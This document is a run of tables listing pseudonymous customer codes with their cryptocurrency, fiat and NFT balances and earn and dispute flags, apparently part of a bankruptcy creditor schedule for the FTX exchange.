| 07402684 | | DOGE[1.39447528], TRX[1], USD[0.00] | | |
| 07402685 | | BAT[3.14417356], BRZ[2], CUSDT[2], DOGE[3], ETH[0], GRT[1.00329662], SHIB[1], TRX[5], UNI[1.04313774], USD[0.00], USDT[1.03384777] | | |
| 07402689 | | BTC[.0000021], ETHW[.000956], LTC[.00327], SOL[.001], USD[0.01] | | |
| 07402690 | | BTC[0], UNI[0], USD[0.21], USDT[0.00139309] | | |
| 07402697 | | USD[1.16], USDT[0] | | |
| 07402698 | | TRX[2], USD[4862.27] | Yes | |
| 07402699 | | BTC[0], USD[24.55], USDT[0.00000007] | | |
| 07402700 | | DOGE[0], ETH[0], SOL[0], USD[0.00] | | |
| 07402701 | | BTC[.00035958] | | |
| 07402703 | | DOGE[1], ETH[.0251586], ETHW[.0251586], USD[0.00] | | |
| 07402706 | | SOL[.79005], USD[1.36] | | |
| 07402711 | | DOGE[1003], TRX[8899.997], USD[296.26], USDT[293.84922712] | | |
| 07402712 | | DOGE[1], USD[0.00] | | |
| 07402713 | | SUSHI[368.7795], USDT[1.912044] | | |
| 07402714 | | USD[0.00] | | |
| 07402716 | | SOL[.13590598], SUSHI[.195475], USD[1055.13] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07402718 | | SUSHI[155.3445], USD[1.96] | | |
| 07402719 | | SOL[.00293572], USD[0.33] | | |
| 07402720 | | DOGE[2082.03762659], ETH[0], SHIB[3], USD[0.00], USDT[0.00000016] | Yes | |
| 07402721 | | BTC[0], SOL[0], USD[0.00], USDT[0] | | |
| 07402724 | | USD[1.75] | | |
| 07402725 | | BTC[.0447009], ETH[.252984], ETHW[.252984], LINK[36.4188], SOL[21.912], UNI[12.4002], USD[10.15], USDT[0], YFI[.00498] | | |
| 07402726 | | BTC[0], LTC[0], USD[0.00] | | |
| 07402728 | | DOGE[1.1772], GRT[3.9848], TRX[327.7498], USD[40.87] | | |
| 07402732 | | USD[0.01] | | |
| 07402735 | | BTC[0], DOGE[0], ETH[0], USD[0.17] | Yes | |
| 07402744 | | BTC[.00000105], ETH[0], ETHW[7.19164914], MATIC[.01734754], NFT [525267603609700320/Saudi Arabia Ticket Stub #2266)[1], UNI[0], USD[0.18], USDT[0.00000001] | Yes | |
| 07402745 | | USD[0.00], USDT[0] | Yes | |
| 07402750 | | CUSDT[2], TRX[1], USD[0.01] | | |
| 07402758 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07402761 | | USD[1.30] | | |
| 07402765 | | BTC[.0000999], USD[4.53] | | |
| 07402766 | | BTC[.00009107], USD[0.00] | | |
| 07402767 | | BTC[.00202255], CUSDT[1], DOGE[6311.1770497], ETH[.27832576], ETHW[.27813018], USD[0.00] | Yes | |
| 07402769 | | USD[0.00] | Yes | |
| 07402770 | | CUSDT[1], DOGE[529.14019815], ETH[.02043052], ETHW[.02043052], SHIB[807213.77183348], TRX[555.43632189], USD[0.00], USDT[0] | | |
| 07402771 | | BRZ[3], CUSDT[7], DOGE[2], LINK[0], MATIC[.00019906], TRX[6], USD[0.01], USDT[0] | Yes | |
| 07402774 | | ETH[.0006157], ETHW[0.00061569] | | |
| 07402781 | | LINK[0.06707008], SOL[.02702913], USDT[0.00000178] | | |
| 07402786 | | DOGE[1], USD[0.00] | | |
| 07402788 | | ETH[0], USD[10.40] | | |
| 07402795 | | USD[0.00], USDT[0] | | |
| 07402802 | | CUSDT[1], DOGE[222.43199725], USD[110.02] | Yes | |
| 07402806 | | DOGE[.732], SOL[21.1432], TRX[.992], USD[1.06] | | |
| 07402809 | | SOL[29.2774092], USD[0.00] | | |
| 07402812 | | AUD[0.00], BCH[.02312528], BRZ[1.52402220], BTC[20.00012678], CAD[0.71], CUSDT[108.74823407], DOGE[1], ETH[0.00238540], ETHW[0.00235802], EUR[0.00], GRT[13.05381466], LINK[0.26669717], SHIB[520223.49759185], SOL[.0000028], SUSHI[1.02319374], TRX[1.00151116], UNI[.65652632], USD[-0.12], USDT[0.00018357] | Yes | |
| 07402818 | Contingent, Disputed | DOGE[0], ETH[0], SOL[0], USD[0.00] | | |
| 07402819 | | BTC[0], SOL[0], SUSHI[0], UNI[.00000001], USD[59.07], USDT[0] | | |
| 07402825 | | BTC[0], CUSDT[8], DOGE[0], ETH[.00470024], ETHW[.00470024], USD[0.00] | | |
| 07402828 | | AVAX[0], BTC[0], ETH[0], ETHW[0], MATIC[0], NFT [365567786919551986/FTX - Off The Grid Miami #369)[1], SOL[0.00000001], USD[0.00], USDT[0.00000130] | | |
| 07402829 | | BTC[.00340597], DOGE[8.00921072], ETH[.13741789], ETHW[.13635789], GRT[66.44990096], LTC[.29710176], SUSHI[2.43559762], TRX[1056.14563264], UNI[7.7660182], USD[260.18] | Yes | |
| 07402833 | | SOL[0], USD[0.22], USDT[50.32833563] | | |
| 07402834 | | BTC[0], DOGE[0], ETH[0], SOL[0], USD[0.09], USDT[0.00003824] | | |
| 07402840 | | DOGE[400] | | |
| 07402841 | | BRZ[1], CUSDT[6.02895154], DOGE[.00001952], TRX[1], USD[0.10] | | |
| 07402842 | | BAT[0], BRZ[1], CUSDT[1], DOGE[2], TRX[3], USD[0.00] | | |
| 07402844 | Contingent, Disputed | BRZ[1], BTC[.01776863], CUSDT[1], DOGE[1], ETH[.48535383], ETHW[.48535383], USD[0.00] | | |
| 07402849 | | BTC[0], ETH[.00000001], PAXG[0.00225903], USD[0.00] | Yes | |
| 07402850 | | SOL[.03332991], USD[0.00], USDT[.00092029] | | |
| 07402857 | | BTC[.00899145], DOGE[18616.47566304], USD[12.91] | | |
| 07402861 | | CUSDT[5130.3193957], USD[0.00], USDT[0] | Yes | |
| 07402862 | | DOGE[4530.656], ETH[.000522], ETHW[.000522], GRT[.187], LINK[.0266], SUSHI[.1615], UNI[.0365], USD[0.11] | | |
| 07402866 | | TRX[.000001], USD[0.66], USDT[2.600048] | | |
| 07402871 | | LTC[.00882916], USD[0.18], USDT[1.1308328] | | |
| 07402874 | | USD[10.00] | | |
| 07402890 | | SOL[0], USD[1.67], USDT[.0912912] | | |
| 07402894 | | BTC[0], ETH[.00000001], NFT [561081400492407170/Mech #8182)[1], USD[0.19] | | |
| 07402898 | | SOL[50.10715085], USD[0.23], USDT[0] | Yes | |
| 07402902 | | CUSDT[1], DOGE[.17108058], NFT [388222163784595544/Microphone #431)[1], USD[0.00] | Yes | |
| 07402905 | | USD[0.06], USDT[0] | | |
| 07402908 | | BRZ[4], CUSDT[5], DOGE[2], SUSHI[.00858828], TRX[4], USD[0.00], USDT[1] | | |
| 07402909 | | BAT[1], DOGE[1709.56880176], ETH[3.02100683], ETHW[3.02100683], GRT[1], TRX[1], USD[0.00] | | |
| 07402911 | | BRZ[1], CUSDT[7], DOGE[.27330857], ETH[.00000061], ETHW[.00000061], LTC[.00173606], SOL[.0010195], TRX[4], UNI[.0634898], USD[0.28] | | |
| 07402917 | | BAT[1.0165555], BRZ[2], CUSDT[5], DOGE[734.80159396], SOL[0.00018964], TRX[4], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07402918 | | BAT[1], BRZ[2], CUSDT[2], DOGE[1], TRX[1], USD[0.00] | | |
| 07402925 | | ALGO[0.00190036], AVAX[5.86450364], BAT[0.97198730], BRZ[3], BTC[.00002689], CUSDT[0], DOGE[2], ETH[0.00000020], ETHW[0.00657017], GRT[0.01015136], KSHIB[908.52941038], LINK[1.65093987], MATIC[0.00093911], NEAR[0.00047387], SHIB[10312203.32528109], SOL[0.00071923], SUSHI[0.00068073], TRX[1.01121074], UNI[0.79259829], USD[1029.64], USDT[0.74860613] | Yes | |
| 07402926 | | BAT[8.83379849], BRZ[84.41052416], CUSDT[472.89411875], DOGE[2573.50702388], GRT[51.33047803], TRX[1466.19590999], USD[0.00] | | |
| 07402928 | | BTC[0.07212780], ETHW[6.1677368], SUSHI[0], USD[2.38] | | |
| 07402932 | | CUSDT[1], TRX[1487.28340271], USD[0.00] | Yes | |
| 07402933 | | BRZ[1], BTC[.00078875], CUSDT[6], DOGE[97.94536056], ETH[0.05843707], ETHW[0.05843707], GRT[22.94474997], LINK[0.57273672], LTC[0.26298806], MATIC[8.1858123], SHIB[1], SOL[3.07098270], SUSHI[5.14479676], UNI[0.89450833], USD[0.00] | | |
| 07402937 | | USD[12.73], USDT[0] | | |
| 07402944 | | ETH[.0116256], ETHW[0.01147715], GRT[3269.60626346], USD[103.48] | Yes | |
| 07402948 | | BTC[0], ETH[0], LTC[.00027528], USD[0.00] | | |
| 07402951 | | USD[20.00] | | |
| 07402955 | | USD[0.00] | | |
| 07402959 | | USD[0.00] | | |
| 07402962 | | MATIC[26.32705238], MKR[.73643765], TRX[1364.34555075], USD[0.01], USDT[0] | Yes | |
| 07402964 | | BTC[0], DOGE[468.81939144], SHIB[99088.85133486], USD[15.60] | Yes | |
| 07402972 | | USDT[2.43092711] | | |
| 07402984 | | BTC[.00016573], CUSDT[2], DOGE[864.4488945], USD[0.00] | | |
| 07402987 | | BTC[.000074], MATIC[269.9487] | | |
| 07402988 | | USD[0.00] | | |
| 07402989 | | ETH[.000838], ETHW[.000838], SOL[183.84597000], USD[66.99], USDT[0.00053220] | | |
| 07402993 | Contingent, Disputed | USD[0.00], USDT[0.00006854] | | |
| 07403000 | | BCH[.10146642], BTC[.00279574], DOGE[5.10223671], ETH[.08632004], ETHW[.08529912], GRT[1.39144129], SHIB[10], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07403001 | | BTC[.03062969], USD[459.14] | | |
| 07403004 | | BRZ[4], BTC[.00804666], CUSDT[5], DOGE[5], ETHW[3.88942901], GRT[3], LINK[6.67026468], LTC[5.2420704], MATIC[139.08504134], NFT (427808785642895215/Saudi Arabia Ticket Stub #2439)[1], SHIB[34759226.59000551], SOL[3.48841732], TRX[8], UNI[9.64494671], USD[0.01], USDT[1.02543197] | Yes | |
| 07403005 | | BAT[0], BRZ[0], BTC[0], DOGE[0], ETH[0], GRT[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00] | | |
| 07403007 | | BTC[0], LINK[0], LTC[.00068], SOL[.00336716], USD[13.48], USDT[9.1825504] | | |
| 07403010 | | DOGE[0], ETH[0], ETHW[0], USD[0.00], USD[0], YFI[0] | | |
| 07403011 | | DOGE[0], ETH[0], LTC[0], TRX[0], USD[0.01], USDT[0] | Yes | |
| 07403012 | | CHF[0.22], USDT[0.00000001] | | |
| 07403014 | Contingent, Disputed | USD[124.58] | | |
| 07403016 | | BRZ[4], CUSDT[20], DOGE[17.36167917], SHIB[2], TRX[9], USD[0.00] | Yes | |
| 07403018 | | TRX[0], USD[0.00] | | |
| 07403019 | | BRZ[3], CUSDT[33], DOGE[.02696506], GRT[1.00418453], SHIB[3], SOL[.00161504], TRX[8], UNI[.00023261], USD[0.00], USDT[1.06612269] | Yes | |
| 07403021 | | ETH[.04985], ETHW[.04985], SOL[19.56881715], SUSHI[37.917], USD[449.48] | | |
| 07403023 | | LINK[6.49959898], SHIB[2], SOL[1.50033809], USD[0.00] | | |
| 07403024 | | CUSDT[1], SOL[56.91888444], USD[0.00] | Yes | |
| 07403026 | | BRZ[1], CUSDT[2], USD[0.00] | | |
| 07403030 | | BRZ[2], CUSDT[5], USD[0.00], USDT[0] | | |
| 07403031 | | CUSDT[2], DOGE[2], SOL[78.65864137], TRX[2], USD[970.64] | | |
| 07403032 | | CUSDT[3], DOGE[1], LINK[.0001462], SHIB[1], SOL[.00062885], USD[0.01] | Yes | |
| 07403033 | | ETH[0], LINK[0], MATIC[0], SHIB[10757955.31884724], SOL[0], USD[334.69], USDT[0] | | |
| 07403034 | | SOL[43.17878068], TRX[2], USD[0.00] | | |
| 07403037 | | BRZ[3], BTC[.01528778], DOGE[5.02647019], ETH[.40507938], ETHW[.40490918], GRT[221.94931935], LINK[2.0337192], LTC[.49904568], MATIC[179.96592742], SHIB[2192730.35046509], SOL[43.36399582], SUSHI[2.11175896], TRX[2], USD[5.71] | Yes | |
| 07403038 | | ETH[0], SOL[0], USD[0.00], USDT[0.00000013] | | |
| 07403039 | | DOGE[3], USD[0.00] | | |
| 07403042 | | BRZ[1], CUSDT[2], GRT[1], TRX[1], USD[0.01] | | |
| 07403045 | | BAT[3.07230072], BRZ[5.02195131], CUSDT[2], DOGE[14.52237542], GRT[2.00330255], MATIC[1.00164518], SHIB[1], SOL[0], SUSHI[1.04196064], TRX[9], USD[0.00], USDT[1.05272443] | Yes | |
| 07403046 | | ETH[.06906266], ETHW[0.06906266], USD[0.00] | | |
| 07403048 | | BRZ[1], CUSDT[12], DOGE[5], ETH[.00000869], ETHW[1.21719087], LINK[39.59688135], MATIC[545.7578801], SHIB[4], TRX[9], USD[353.35] | Yes | |
| 07403050 | | DOGE[1], SOL[19.17242349], USD[0.00] | Yes | |
| 07403062 | | BTC[0], DOGE[1], GRT[1], SOL[0] | | |
| 07403071 | | DOGE[1], SOL[17.42748875], USD[0.00] | | |
| 07403074 | | AAVE[0], AVAX[0], BRZ[2], DAI[0], DOGE[0], ETH[0], GRT[2], LINK[0.00000001], LTC[0], MATIC[0], NFT (528880881559089305/NFT)[1], SHIB[9], SOL[0.10000000], TRX[3], USD[6.54], USDT[1.02544796] | Yes | |
| 07403076 | | ETH[0], SOL[0], USD[0.00] | | |
| 07403080 | | BTC[.00035456], DOGE[1], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07403081 | | BRZ[1], BTC[.04533073], CUSDT[3], DOGE[4.04682059], ETH[.51583362], ETHW[.43872467], GRT[548.93828668], LINK[27.37340353], MATIC[373.84954081], NFT (29204326657695959860/Bevel Boy #031 - The Goat)[1], NFT (311522419492936744/Taco #1 - Power Up)[1], NFT (367250523800493499/Anime #21)[1], NFT (388873568280804115/Day and Night #1)[1], NFT (389337468722028118/CryptoAvatar #34)[1], NFT (422098674822699184/Day and Night #2)[1], NFT (433190777275660819/DRIP NFT)[1], NFT (455808845654194616/I Love You)[1], NFT (485174511720195785/Waterfalls )[1], NFT (490742323181098683/Crypto Avatar Art #39)[1], NFT (522868561880430697/Marilyn Monroe Set #3)[1], SHIB[6], SOL[80.65334341], SUSHI[63.09963904], TRX[3], USD[0.00], USDT[2.17282824] | Yes | |
| 07403083 | | AAVE[.00019197], BAT[4.35550114], BRZ[3], BTC[0], CUSDT[4], DOGE[5.08402519], GRT[1.00073206], LINK[1.09069664], SOL[0.00908503], SUSHI[1.0862349], TRX[5], UNI[3.26760705], USD[0.00], USDT[0.00] | Yes | |
| 07403090 | | BAT[2.06270104], BRZ[7.58374018], CUSDT[4], DOGE[10.50544456], ETH[0], GRT[1.0049888], SHIB[2], SOL[0.00037089], SUSHI[1.70519455], TRX[9.00087675], UNI[0], USD[0.01], USDT[0.00000013], YFI[0] | Yes | |
| 07403092 | | BTC[.00567225] | | |
| 07403094 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07403099 | | USD[0.00], USDT[0] | | |
| 07403103 | | SOL[.06], USD[5012.23], YFI[.00099] | | |
| 07403104 | | CUSDT[1], SOL[8.85614498], USD[0.00] | | |
| 07403105 | | BTC[.00177486], DOGE[2], SOL[8.89597466], USD[0.00] | | |
| 07403113 | | BRZ[1], SHIB[1], USD[0.01] | Yes | |
| 07403118 | | DOGE[686.62417953], USD[0.00] | | |
| 07403120 | | BTC[0], LTC[0] | | |
| 07403124 | | BRZ[1], BTC[.01939211], ETH[.23899263], ETHW[.23899263], SOL[19.65913255], TRX[2], USD[114.00] | | |
| 07403125 | | MATIC[5302.66546833], SHIB[1], USD[0.00] | Yes | |
| 07403127 | | BTC[.00006187], DOGE[28.884], SOL[27.2904] | | |
| 07403129 | | BRZ[1], DOGE[313.49443433], SOL[29.57508066], TRX[1], USD[11.08] | Yes | |
| 07403131 | | USD[0.01] | | |
| 07403134 | | DOGE[1], USD[0.00] | | |
| 07403137 | | BRZ[1], BTC[.00358759], USD[0.00] | | |
| 07403138 | | DOGE[1], ETH[.19555097], ETHW[.19555097], USD[0.00] | | |
| 07403149 | | BRZ[1], BTC[.00001656], DOGE[3], GRT[1], SOL[.00791591], TRX[1], USD[0.01], USDT[1] | | |
| 07403151 | | BAT[1.01124746], BRZ[1], DOGE[1], SOL[362.75986049], TRX[1], USD[0.00] | Yes | |
| 07403154 | | SOL[.26766167], USD[37.00] | | |
| 07403155 | | DOGE[0], LTC[0], TRX[0], USD[0.00], USDT[0] | | |
| 07403156 | | CUSDT[1], DOGE[28.15909937], USD[0.00] | | |
| 07403165 | | BTC[0], DOGE[0], ETH[0], SOL[0], USD[8.68], USDT[0] | | |
| 07403168 | | BTC[.07165548], NFT (341915709662120939/FTX - Off The Grid Miami #1282)[1], NFT (378321438658540273/GSW Western Conference Finals Commemorative Banner #1211)[1], NFT (391908497993378358/Imola Ticket Stub #1482)[1], NFT (422565530771499648/GSW Western Conference Finals Commemorative Banner #1212)[1], NFT (439320727448704423/2974 Floyd Norman - CLE 2-0227)[1], NFT (492908168865541947/GSW Western Conference Semifinals Commemorative Ticket #644)[1], NFT (500460116590724422/2974 Floyd Norman - OKC 5-0148)[1], NFT (513312529648767854/2974 Floyd Norman - CLE 5-0116)[1], NFT (533207091927207087/GSW Championship Commemorative Ring)[1], NFT (570932992352312437/Warriors Foam Finger #159 (Redeemed))[1], SOL[34.84], USD[120.87] | | |
| 07403169 | | DOGE[1], SOL[17.91324064], USD[144.71], USDT[2.15245736] | Yes | |
| 07403172 | | BAT[182.91935027], BRZ[1], BTC[0.01653669], ETH[0.46065309], ETHW[0.46045943], SOL[14.92650844], SUSHI[76.93777837], TRX[0], USD[0.00] | Yes | |
| 07403174 | | BRZ[2], CUSDT[35], DOGE[4.01461195], SOL[.00163643], TRX[6], USD[23.26] | Yes | |
| 07403175 | | BRZ[225.72120181], CUSDT[4], GRT[1], TRX[5296.19830505], USD[0.00], USDT[4] | | |
| 07403176 | | DOGE[157.04424609], TRX[2], USD[0.00] | | |
| 07403177 | | BRZ[2], BTC[0], CUSDT[3], GRT[2], TRX[2], USD[0.00] | | |
| 07403181 | | USD[0.00], USDT[0] | | |
| 07403182 | | BRZ[0], BTC[0], SOL[0], USD[0.00], USDT[0] | | |
| 07403186 | Contingent, Disputed | AVAX[.00211682], SOL[.00955] | | |
| 07403188 | | BTC[.00018021], CUSDT[1], DOGE[1], TRX[2], USD[0.01] | | |
| 07403189 | | BRZ[3], BTC[0], CUSDT[8], DOGE[2], TRX[4377.21571990], USD[0.00], USDT[0] | | |
| 07403193 | | BRZ[2], CUSDT[2], ETH[.5793312], ETHW[.5793312], USD[0.01], USDT[1] | | |
| 07403194 | | CUSDT[1], DOGE[128.60285727], USD[0.00] | | |
| 07403195 | | BTC[0], USD[1.32] | | |
| 07403200 | | DOGE[.00004878], USD[0.81] | | |
| 07403205 | | BAT[1], CUSDT[2], DOGE[3], USD[50.73] | | |
| 07403206 | | BRZ[1], CUSDT[42.20144299], TRX[1], USD[0.05] | | |
| 07403208 | | SOL[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07403209 | | BRZ[1], CUSDT[2], SHIB[2224.78668363], TRX[2], USD[0.01] | Yes | |
| 07403215 | | BRZ[6.1032336], CUSDT[22], DOGE[1], SOL[.00040612], TRX[1], USD[0.01], USDT[2.07265242] | | |
| 07403216 | | CUSDT[1], SOL[106.39193505], TRX[1], USD[0.00] | Yes | |
| 07403217 | | BTC[0], DOGE[0], ETH[.00000001], USD[0.04], USDT[0] | | |
| 07403219 | | DOGE[2], ETH[.01287268], ETHW[.01287268], LINK[1.00851374], USD[22.00] | | |
| 07403220 | | BTC[.05259389], ETHW[2.75490128], USD[0.01] | Yes | |
| 07403231 | | BAT[1], CUSDT[1], TRX[2], USD[0.00] | | |
| 07403232 | | BCH[.0600126], CAD[59.74], CUSDT[2342.7439197], DOGE[437.77582568], ETH[.03698175], ETHW[.03698175], GRT[60.02366877], TRX[78.86854755], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity|NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07403238 | | DAI[0], ETH[.17119051], ETHW[.17090347], SHIB[2], SOL[2.03122755], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07403240 | | DOGE[470.90581988], USD[0.00], USDT[0] | | |
| 07403243 | | LTC[4.00392], USD[2.35] | | |
| 07403244 | | USD[2.97], USDT[0] | Yes | |
| 07403247 | | BCH[0], DOGE[0], GRT[0], SOL[0], USD[0.00] | | |
| 07403248 | | BTC[.00406367], CUSDT[1], DOGE[1], USD[0.00] | | |
| 07403254 | | TRX[1], USD[0.00] | | |
| 07403255 | | BRZ[2], BTC[0], CUSDT[3], DOGE[5579.9416594], TRX[13272.47502187], USD[0.00] | Yes | |
| 07403256 | | BRZ[1], CUSDT[2], USD[0.00] | | |
| 07403266 | | BAT[5.34255517], BRZ[5.05012683], BTC[.82799153], CUSDT[2], DOGE[4.01274557], ETH[9.14882561], ETHW[9.14624187], GRT[3.11526103], SOL[1478.49822945], TRX[8.00056353], UNI[206.80284219], USD[0.01], USDT[2.13702181] | Yes | |
| 07403269 | | BRZ[2], BTC[0], CUSDT[12], DOGE[0], ETH[0], ETHW[0], LTC[0], TRX[0], USD[63.89], USDT[1.09668345] | Yes | |
| 07403274 | | BAT[424.55452379], BRZ[2686.92150072], BTC[.28027438], CUSDT[23448.36254687], DAI[496.36021535], DOGE[1655.9192819], ETH[.55337231], ETHW[.55337231], SOL[10.79233648], TRX[4121.21517871], USD[0.00], USDT[1] | Yes | |
| 07403276 | | BAT[2.04514292], BRZ[3], CUSDT[13], DOGE[0], ETH[0], ETHW[2.30316071], LINK[.00016475], SHIB[0.0000010], USD[120.24], USDT[0] | Yes | |
| 07403280 | | BTC[0], USD[0.00] | | |
| 07403284 | | TRX[6175.49105] | | |
| 07403285 | | AAVE[.00764461], BAT[1.0116629], BRZ[1], DOGE[3], ETH[.0009266], ETHW[2.06586956], GRT[.03557729], SHIB[4], SOL[0], TRX[3], USD[0.01], USDT[2.08344894] | Yes | |
| 07403290 | | BTC[0], NFT (49436226865615020/SOLYETIS #2245)[1], USD[50.04] | Yes | |
| 07403296 | | TRX[3895.773], USDT[.071055] | | |
| 07403302 | | ETH[0], SOL[0] | | |
| 07403306 | | CUSDT[1], TRX[1], USD[987.40] | | |
| 07403308 | | CUSDT[44], SHIB[526513.62358804], TRX[8], USD[0.00], USDT[1.07542079] | Yes | |
| 07403315 | | BF_POINT[200], USD[0.00] | | |
| 07403316 | | DOGE[1], ETH[1.04122303], ETHW[1.04122303], NFT (49641259471211879/Coachella x FTX Weekend 2 #8017)[1], TRX[2], USD[0.00], USDT[1] | | |
| 07403317 | | ETH[0.00000001], ETHW[0], SOL[0] | | |
| 07403318 | | CUSDT[3], USD[0.00] | | |
| 07403319 | | SOL[0], USD[0.00] | | |
| 07403322 | | BTC[.00000001] | | |
| 07403327 | | DOGE[8411.952], USD[0.28] | | |
| 07403328 | | AVAX[0], BTC[0.00006506], ETH[0.00072445], ETHW[0.04821037], LINK[.00655428], SOL[0.00645861], SUSHI[-0.37907473], USD[1.15], USDT[0.00640703] | | |
| 07403331 | | BRZ[2], CUSDT[2], DAI[.6371886], DOGE[2.00003757], GRT[.00000859], LINK[.00000588], SOL[.00004949], SUSHI[.00048634], TRX[1.00002671], UNI[.00002191], USD[0.00], USDT[0.00003923] | | |
| 07403333 | | BTC[.00001703], USD[0.00], USDT[0.00009394] | | |
| 07403339 | | DOGE[0], ETH[0], LTC[0], SOL[0], TRX[0], USD[0.00], USDT[0] | | |
| 07403345 | | BF_POINT[100], USD[0.02] | | |
| 07403346 | | BRZ[1], DOGE[0], ETH[0], ETHW[0], TRX[0], USD[0.00] | Yes | |
| 07403348 | | LTC[.00261813], USD[0.39] | | |
| 07403350 | | BAT[1.01348725], BRZ[3], CUSDT[12], DOGE[1042.43068926], SOL[114.1529495], TRX[6], USD[108.02], USDT[2.18581068] | Yes | |
| 07403352 | | BRZ[2], CUSDT[6], DOGE[17.71019957], TRX[1], USD[0.01] | Yes | |
| 07403354 | | BTC[0.04409697], ETH[0], NFT (52749360645082103/Entrance Voucher #2822)[1], USD[1.90] | | |
| 07403357 | | LTC[.00284071], USD[1.27] | | |
| 07403365 | | AVAX[6.90432511], BAT[1], BRZ[5.07952967], CUSDT[28], DOGE[12.78511442], ETH[.39697204], ETHW[.39680543], LINK[8.25911869], MATIC[91.4923321], NFT (42275339555043746Entrance Voucher #2091)[1], SHIB[2446335.2395046], SOL[10.53209492], SUSHI[24.02818284], TRX[8], USD[0.64] | Yes | |
| 07403367 | | CUSDT[1], SOL[171.85777285], TRX[1], USD[0.00] | | |
| 07403378 | | USD[0.00] | | |
| 07403379 | | BTC[0], USD[10.03] | | |
| 07403386 | | DOGE[.823], LTC[.02086034], TRX[.39], USD[0.00] | | |
| 07403388 | | BAT[2], BRZ[1], CUSDT[14], DOGE[2435.10901036], ETH[.52571706], ETHW[.52571706], GRT[1], SOL[75.39607774], TRX[1], USD[0.01], USDT[2] | | |
| 07403390 | | BAT[0], BRZ[3], BTC[0], CUSDT[12], DAI[0], DOGE[0], ETH[0], GRT[0], LTC[0], MATIC[0], SHIB[1], SOL[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07403393 | | CUSDT[1], DOGE[2], TRX[2], USD[0.00], USDT[0] | | |
| 07403395 | | BTC[0.00000196], ETH[0], LTC[0.44339298], TRX[1], USD[0.00] | | |
| 07403400 | | BRZ[1], CUSDT[1], SOL[0] | | |
| 07403402 | | USD[0.00] | | |
| 07403403 | | BRZ[1], CUSDT[3], DOGE[1972.6196876], SOL[72.89421977], TRX[4], USD[0.00] | Yes | |
| 07403404 | | NFT (49065723179782152Solana Spaces Tutorial NFT #17)[1], NFT (5188442517475759686Forever flowers #1)[1], NFT (5567003867452031686FTX - Off The Grid Miami #4809)[1], USD[0.01] | | |
| 07403407 | Contingent, Disputed | USD[0.00] | | |
| 07403410 | | USD[0.00] | | |
| 07403412 | | MATIC[0], USD[2.19], USDT[0] | Yes | |
| 07403430 | | BAT[1.01644936], BRZ[1], CUSDT[7], DOGE[6.18589734], ETH[0.80480280], ETHW[0.80446470], GRT[1.00393779], MATIC[0], SHIB[5837654.64929533], SOL[32.09343246], TRX[1], UNI[1.09854844], USD[0.00], USDT[3.77102799] | Yes | |
| 07403436 | | CUSDT[1], SOL[0] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07403442 | | BRZ[2], CUSDT[8], DOGE[1341.89212623], GRT[118.44662956], MATIC[20.33182849], SOL[5.12192949], SUSHI[4.45344396], TRX[353.81382709], USD[27.51] | Yes | |
| 07403443 | | BAT[2], CUSDT[3], DOGE[2], GRT[3], SOL[78.42543313], TRX[1], USD[0.00], USDT[1] | | |
| 07403444 | | DOGE[2], TRX[1], USD[0.01] | | |
| 07403445 | Contingent, Disputed | USD[0.00] | | |
| 07403447 | | TRX[.396], USD[0.68] | | |
| 07403452 | | DOGE[.08631714], SHIB[13850314.2917676], USD[0.00] | | |
| 07403455 | Contingent, Disputed | AAVE[0], LTC[0], SOL[.00000001], SUSHI[0], USD[0.01], USDT[0], YFI[0] | | |
| 07403456 | | BTC[0], DOGE[0.11028687], ETH[0], LTC[0.00400597], SOL[0.03142801], SUSHI[0], USD[0.00], USDT[0.00000053] | | |
| 07403457 | | BAT[1], BTC[.01975067], CUSDT[2], DOGE[2], ETH[.85688462], ETHW[.85688462], TRX[1], USD[1804.63] | | |
| 07403459 | | BAT[1], BTC[0], SOL[0], TRX[1] | | |
| 07403460 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07403465 | | GRT[.00224515], SOL[.00068215], TRX[1], USD[0.01], USDT[0] | | |
| 07403470 | | SOL[3.00304144] | | |
| 07403474 | | TRX[.7024677], USD[0.00] | | |
| 07403476 | | AAVE[.00004345], AVAX[.00059354], BRZ[3], CUSDT[9], DOGE[7.13806173], ETHW[8.05303812], GRT[.0230032], SHIB[1397134.24793803], TRX[7], USD[0.00] | Yes | |
| 07403478 | | DOGE[1], USD[0.00], USDT[1] | | |
| 07403479 | | USD[500.00] | | |
| 07403481 | | BRZ[1], CUSDT[3], DOGE[806.1403092], ETH[2.08665972], ETHW[2.08578335], GRT[2.03680276], MATIC[14.33161895], SHIB[367.0673998], SOL[2.60391455], TRX[3], USD[0.06] | Yes | |
| 07403486 | | TRX[0], USDT[0.02104756] | | |
| 07403488 | | CUSDT[9], DOGE[556.72621309], SOL[81.15209432], TRX[4], USD[0.00] | Yes | |
| 07403489 | | DOGE[0], ETH[.01486359], ETHW[.01467983], LTC[.11389875], TRX[154.47483002], USD[0.00] | Yes | |
| 07403500 | | SOL[0], USD[0.00] | | |
| 07403501 | | SHIB[291.58049113], USD[0.00] | Yes | |
| 07403512 | | BTC[0], DOGE[0], TRX[1] | | |
| 07403515 | | CUSDT[2], DOGE[1], USD[0.01] | | |
| 07403517 | | BTC[.00478176], ETH[.2138442], ETHW[.2138442], EUR[0.68], GRT[.879], KSHIB[2520], SOL[.0088], SUSHI[14.943], TRX[.291], USD[1.01], USDT[.00059865], YFI[.009962] | | |
